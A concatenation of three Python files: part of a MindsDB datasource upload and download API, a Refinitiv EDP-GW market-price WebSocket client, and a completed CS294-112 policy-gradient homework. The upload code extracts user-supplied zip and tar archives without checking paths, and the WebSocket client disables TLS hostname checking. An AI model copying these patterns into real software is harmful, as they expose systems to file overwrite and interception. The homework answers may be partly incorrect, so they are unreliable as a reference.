chunk = request.stream.read(8192)
if not chunk:
break
parser.write(chunk)
parser.finalize()
parser.close()
if file_object is not None and not file_object.closed:
file_object.close()
else:
data = request.json
if 'query' in data:
integration_id = request.json['integration_id']
integration = request.integration_controller.get(integration_id)
if integration is None:
abort(400, f"{integration_id} integration doesn't exist")
if integration['type'] == 'mongodb':
data['find'] = data['query']
request.default_store.save_datasource(name, integration_id, data)
os.rmdir(temp_dir_path)
return request.default_store.get_datasource(name)
ds_name = data['name'] if 'name' in data else name
source = data['source'] if 'source' in data else name
source_type = data['source_type']
try:
if source_type == 'file':
file_path = os.path.join(temp_dir_path, data['file'])
lp = file_path.lower()
if lp.endswith(('.zip', '.tar.gz')):
if lp.endswith('.zip'):
with zipfile.ZipFile(file_path) as f:
f.extractall(temp_dir_path)
elif lp.endswith('.tar.gz'):
with tarfile.open(file_path) as f:
f.extractall(temp_dir_path)
os.remove(file_path)
files = os.listdir(temp_dir_path)
if len(files) != 1:
os.rmdir(temp_dir_path)
return http_error(400, 'Wrong content.', 'Archive must contain only one data file.')
file_path = os.path.join(temp_dir_path, files[0])
source = files[0]
if not os.path.isfile(file_path):
os.rmdir(temp_dir_path)
return http_error(400, 'Wrong content.', 'Archive must contain data file in root.')
# TODO
# request.default_store.save_datasource(ds_name, source_type, source, file_path)
if data['file'] is not None:
file_name = Path(data['file']).name
else:
file_name = Path(file_path).name
file_id = request.default_store.save_file(ds_name, file_path, file_name=file_name)
request.default_store.save_datasource(ds_name, source_type, source={'mindsdb_file_name': name})
else:
file_path = None
request.default_store.save_datasource(ds_name, source_type, source)
except Exception as e:
return http_error(400, 'Error', str(e))
finally:
shutil.rmtree(temp_dir_path)
return request.default_store.get_datasource(ds_name)
def analyzing_thread(name, default_store):
try:
from mindsdb.interfaces.storage.db import session
default_store.start_analysis(name)
session.close()
except Exception as e:
log.error(e)
@ns_conf.route('/<name>/analyze')
@ns_conf.param('name', 'Datasource name')
class Analyze(Resource):
@ns_conf.doc('analyse_dataset')
def get(self, name):
analysis = request.default_store.get_analysis(name)
if analysis is not None:
return analysis, 200
ds = request.default_store.get_datasource(name)
if ds is None:
log.error('No valid datasource given')
abort(400, 'No valid datasource given')
x = threading.Thread(target=analyzing_thread, args=(name, request.default_store))
x.start()
return {'status': 'analyzing'}, 200
@ns_conf.route('/<name>/analyze_refresh')
@ns_conf.param('name', 'Datasource name')
class Analyze2(Resource):
@ns_conf.doc('analyze_refresh_dataset')
def get(self, name):
analysis = request.default_store.get_analysis(name)
if analysis is not None:
return analysis, 200
ds = request.default_store.get_datasource(name)
if ds is None:
log.error('No valid datasource given')
abort(400, 'No valid datasource given')
x = threading.Thread(target=analyzing_thread, args=(name, request.default_store))
x.start()
return {'status': 'analyzing'}, 200
@ns_conf.route('/<name>/data/')
@ns_conf.param('name', 'Datasource name')
class DatasourceData(Resource):
@ns_conf.doc('get_datasource_data', params=get_datasource_rows_params)
def get(self, name):
'''return data rows'''
ds = request.default_store.get_datasource(name)
if ds is None:
abort(400, 'No valid datasource given')
params = {
'page[size]': None,
'page[offset]': None
}
where = []
for key, value in request.args.items():
if key == 'page[size]':
params['page[size]'] = int(value)
if key == 'page[offset]':
params['page[offset]'] = int(value)
elif key.startswith('filter'):
param = parse_filter(key, value)
if param is None:
abort(400, f'Not valid filter "{key}"')
where.append(param)
data_dict = request.default_store.get_data(name, where, params['page[size]'], params['page[offset]'])
return data_dict, 200
@ns_conf.route('/<name>/download')
@ns_conf.param('name', 'Datasource name')
class DatasourceMissedFilesDownload(Resource):
@ns_conf.doc('get_datasource_download')
def get(self, name):
'''download uploaded file'''
ds = request.default_store.get_datasource(name)
if not ds:
abort(404, "{} not found".format(name))
# force download from s3
request.default_store.get_datasource_obj(name)
if not os.path.exists(ds['source']):
abort(404, "{} not found".format(name))
return send_file(os.path.abspath(ds['source']), as_attachment=True)
|
market_price_edpgw_authentication.py
|
#!/usr/bin/env python
#|-----------------------------------------------------------------------------
#| This source code is provided under the Apache 2.0 license --
#| and is provided AS IS with no warranty or guarantee of fit for purpose. --
#| See the project's LICENSE.md for details. --
#| Copyright Thomson Reuters 2018. All rights reserved. --
#|-----------------------------------------------------------------------------
"""
Simple example of authenticating to EDP-GW and using the token to login and
retrieve MarketPrice content. A username and password are used to retrieve
this token.
"""
import sys
import time
import getopt
import requests
import socket
import json
import websocket
import threading
# Global Default Variables
app_id = '256'
auth_url = 'https://api.refinitiv.com:443/auth/oauth2/beta1/token'
hostname = ''
password = ''
position = ''
sts_token = ''
refresh_token = ''
user = ''
clientid = ''
port = '443'
client_secret = ''
scope = 'trapi'
ric = '/TRI.N'
service = 'ELEKTRON_DD'
view = []
no_streaming = False
# Global Variables
web_socket_app = None
web_socket_open = False
logged_in = False
def process_message(message_json):
""" Parse at high level and output JSON of message """
message_type = message_json['Type']
if message_type == "Refresh":
if 'Domain' in message_json:
message_domain = message_json['Domain']
if message_domain == "Login":
process_login_response(message_json)
elif message_type == "Ping":
pong_json = {'Type': 'Pong'}
web_socket_app.send(json.dumps(pong_json))
print("SENT:")
print(json.dumps(pong_json, sort_keys=True, indent=2, separators=(',', ':')))
def process_login_response(message_json):
""" Send item request """
global logged_in
if message_json['State']['Stream'] != "Open" or message_json['State']['Data'] != "Ok":
print("Login failed.")
sys.exit(1)
logged_in = True
send_market_price_request(ric)
def send_market_price_request(ric_name):
""" Create and send simple Market Price request """
mp_req_json = {
'ID': 2,
'Key': {
'Name': ric_name,
'Service': service
},
'Streaming': not no_streaming,
}
if view:
mp_req_json['View'] = view
web_socket_app.send(json.dumps(mp_req_json))
print("SENT:")
print(json.dumps(mp_req_json, sort_keys=True, indent=2, separators=(',', ':')))
def send_login_request(auth_token, is_refresh_token):
"""
Send login request with authentication token.
Used both for the initial login and subsequent reissues to update the authentication token
"""
login_json = {
'ID': 1,
'Domain': 'Login',
'Key': {
'NameType': 'AuthnToken',
'Elements': {
'ApplicationId': '',
'Position': '',
'AuthenticationToken': ''
}
}
}
login_json['Key']['Elements']['ApplicationId'] = app_id
login_json['Key']['Elements']['Position'] = position
login_json['Key']['Elements']['AuthenticationToken'] = auth_token
# If the token is a refresh token, this is not our first login attempt.
if is_refresh_token:
login_json['Refresh'] = False
web_socket_app.send(json.dumps(login_json))
print("SENT:")
print(json.dumps(login_json, sort_keys=True, indent=2, separators=(',', ':')))
def on_message(_, message):
""" Called when message received, parse message into JSON for processing """
print("RECEIVED: ")
message_json = json.loads(message)
print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))
for singleMsg in message_json:
process_message(singleMsg)
def on_error(_, error):
""" Called when websocket error has occurred """
print(error)
def on_close(_):
""" Called when websocket is closed """
global web_socket_open
web_socket_open = False
print("WebSocket Closed")
def on_open(_):
""" Called when handshake is complete and websocket is open, send login """
print("WebSocket successfully connected!")
global web_socket_open
web_socket_open = True
send_login_request(sts_token, False)
def get_sts_token(current_refresh_token, url=None):
"""
Retrieves an authentication token.
:param current_refresh_token: Refresh token retrieved from a previous authentication, used to retrieve a
subsequent access token. If not provided (i.e. on the initial authentication), the password is used.
"""
if url is None:
url = auth_url
if not current_refresh_token: # First time through, send password
if url.startswith('https'):
data = {'username': user, 'password': password, 'grant_type': 'password', 'takeExclusiveSignOnControl': True,
'scope': scope}
else:
data = {'username': user, 'password': password, 'client_id': clientid, 'grant_type': 'password', 'takeExclusiveSignOnControl': True,
'scope': scope}
print("Sending authentication request with password to", url, "...")
else: # Use the given refresh token
if url.startswith('https'):
data = {'username': user, 'refresh_token': current_refresh_token, 'grant_type': 'refresh_token'}
else:
data = {'username': user, 'client_id': clientid, 'refresh_token': current_refresh_token, 'grant_type': 'refresh_token'}
print("Sending authentication request with refresh token to", url, "...")
try:
if url.startswith('https'):
# Request with auth for https protocol
r = requests.post(url,
headers={'Accept': 'application/json'},
data=data,
auth=(clientid, client_secret),
verify=True,
allow_redirects=False)
else:
# Request without auth for non https protocol (e.g. http)
r = requests.post(url,
headers={'Accept': 'application/json'},
data=data,
verify=True,
allow_redirects=False)
except requests.exceptions.RequestException as e:
print('EDP-GW authentication exception failure:', e)
return None, None, None
if r.status_code == 200:
auth_json = r.json()
print("EDP-GW Authentication succeeded. RECEIVED:")
print(json.dumps(auth_json, sort_keys=True, indent=2, separators=(',', ':')))
return auth_json['access_token'], auth_json['refresh_token'], auth_json['expires_in']
elif r.status_code == 301 or r.status_code == 302 or r.status_code == 307 or r.status_code == 308:
# Perform URL redirect
print('EDP-GW authentication HTTP code:', r.status_code, r.reason)
new_host = r.headers['Location']
if new_host is not None:
print('Perform URL redirect to ', new_host)
return get_sts_token(current_refresh_token, new_host)
return None, None, None
elif r.status_code == 400 or r.status_code == 401:
# Retry with username and password
print('EDP-GW authentication HTTP code:', r.status_code, r.reason)
if current_refresh_token:
# Refresh token may have expired. Try using our password.
print('Retry with username and password')
return get_sts_token(None)
return None, None, None
elif r.status_code == 403 or r.status_code == 451:
# Stop retrying with the request
print('EDP-GW authentication HTTP code:', r.status_code, r.reason)
print('Stop retrying with the request')
return None, None, None
else:
# Retry the request to the API gateway
print('EDP-GW authentication HTTP code:', r.status_code, r.reason)
print('Retry the request to the API gateway')
return get_sts_token(current_refresh_token)
if __name__ == "__main__":
# Get command line parameters
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["help", "hostname=", "port=", "app_id=", "user=", "clientid=", "password=",
"position=", "auth_url=", "scope=", "ric=", "service=", "view=", "no_streaming"])
except getopt.GetoptError:
print('Usage: market_price_edpgw_authentication.py [--hostname hostname] [--port port] [--app_id app_id] '
'[--user user] [--clientid clientid] [--password password] [--position position] [--auth_url auth_url] '
'[--scope scope] [--ric ric] [--service service] [--view view] [--no_streaming] [--help]')
sys.exit(2)
for opt, arg in opts:
if opt in "--help":
print('Usage: market_price_edpgw_authentication.py [--hostname hostname] [--port port] [--app_id app_id] '
'[--user user] [--clientid clientid] [--password password] [--position position] [--auth_url auth_url] '
'[--scope scope] [--ric ric] [--service service] [--view view] [--no_streaming] [--help]')
sys.exit(0)
elif opt in "--hostname":
hostname = arg
elif opt in "--port":
port = arg
elif opt in "--app_id":
app_id = arg
elif opt in "--user":
user = arg
elif opt in "--clientid":
clientid = arg
elif opt in "--password":
password = arg
elif opt in "--position":
position = arg
elif opt in "--auth_url":
auth_url = arg
elif opt in "--scope":
scope = arg
elif opt in "--ric":
ric = arg
elif opt in "--service":
service = arg
elif opt in "--view":
view = arg.split(',')
elif opt in "--no_streaming":
no_streaming = True
if user == '' or password == '' or hostname == '' or clientid == '':
print("user, clientid, password, and hostname are required options")
sys.exit(2)
if position == '':
# Populate position if possible
try:
position_host = socket.gethostname()
position = socket.gethostbyname(position_host) + "/" + position_host
except socket.gaierror:
position = "127.0.0.1/net"
sts_token, refresh_token, expire_time = get_sts_token(None)
if not sts_token:
sys.exit(1)
# Start websocket handshake
ws_address = "wss://{}:{}/WebSocket".format(hostname, port)
print("Connecting to WebSocket " + ws_address + " ...")
web_socket_app = websocket.WebSocketApp(ws_address, on_message=on_message,
on_error=on_error,
on_close=on_close,
subprotocols=['tr_json2'])
web_socket_app.on_open = on_open
# Event loop
wst = threading.Thread(target=web_socket_app.run_forever, kwargs={'sslopt': {'check_hostname': False}})
wst.start()
try:
while True:
# Give 30 seconds to obtain the new security token and send reissue
if int(expire_time) > 30:
time.sleep(int(expire_time) - 30)
else:
# Fail the refresh since value too small
sys.exit(1)
sts_token, refresh_token, expire_time = get_sts_token(refresh_token)
if not sts_token:
sys.exit(1)
# Update token.
if logged_in:
send_login_request(sts_token, True)
except KeyboardInterrupt:
web_socket_app.close()
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR CODE HERE
with tf.variable_scope(scope):
net = input_placeholder
for i in range(n_layers):
net = tf.layers.dense(net, size, activation, name='dense{}'.format(i))
output_placeholder = tf.layers.dense(net, output_size, output_activation)
return output_placeholder
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # pylint: disable=E1101
tf_config.gpu_options.visible_device_list = '0' # pylint: disable=E1101
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in policy gradient
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name='adv', dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim,
"model", self.n_layers, self.size, activation=tf.tanh, output_activation=None)
return sy_logits_na
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, self.ac_dim,
"model", self.n_layers, self.size, activation=tf.tanh, output_activation=None)
sy_logstd = tf.Variable(initial_value=0, dtype=tf.float32)
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na,1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = sy_mean + tf.random_normal(tf.shape(sy_mean))*tf.exp(sy_logstd)
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
logp_all = tf.nn.log_softmax(sy_logits_na)
sy_logprob_n = tf.reduce_sum(tf.one_hot(sy_ac_na, depth=self.ac_dim) * logp_all, axis=1)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_CODE_HERE
EPS = 1e-8
sy_logprob_n = -0.5 * (((sy_ac_na-sy_mean)/(tf.exp(sy_logstd)+EPS))**2 + 2*sy_logstd + np.log(2*np.pi))
sy_logprob_n = tf.reduce_sum(sy_logprob_n, axis=1)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
loss = -tf.reduce_sum(self.sy_logprob_n * self.sy_adv_n) # YOUR CODE HERE
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
# YOUR_CODE_HERE
self.sy_target_n = tf.placeholder(shape=[None, ], name='baseline', dtype=tf.float32)
baseline_loss = tf.losses.mean_squared_error(self.sy_target_n, self.baseline_prediction)
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no:ob.reshape(-1,self.ob_dim)})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
reward_list = []
if self.reward_to_go:
for r in re_n:
r_reversed = np.flip(r)
t_sum = 0
t_r_list = []
for i in range(len(r_reversed)):
t_sum = r_reversed[i] + self.gamma*t_sum
t_r_list.append(t_sum)
list.reverse(t_r_list)
reward_list.extend(t_r_list)
else:
for r in re_n:
t_sum = 0
for i in range(len(r)):
t_sum += self.gamma**i * r[i]
reward_list += [t_sum]*len(r)
return np.array(reward_list)
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no:ob_no.reshape(-1,self.ob_dim)})
b_n_mean = b_n.mean()
b_n_std = b_n.std()
b_n = (b_n - b_n_mean)/b_n_std
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_mean = adv_n.mean()
adv_std = adv_n.std()
adv_n = (adv_n - adv_mean)/adv_std
return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# YOUR_CODE_HERE
q_n_mean = q_n.mean()
q_n_std = q_n.std()
target_n = (q_n - q_n_mean)/q_n_std
_ = self.sess.run(self.baseline_update_op, feed_dict = {self.sy_target_n : target_n, self.sy_ob_no : ob_no})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
self.sess.run(self.update_op, feed_dict={self.sy_ob_no:ob_no, self.sy_ac_na:ac_na, self.sy_adv_n:adv_n})
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
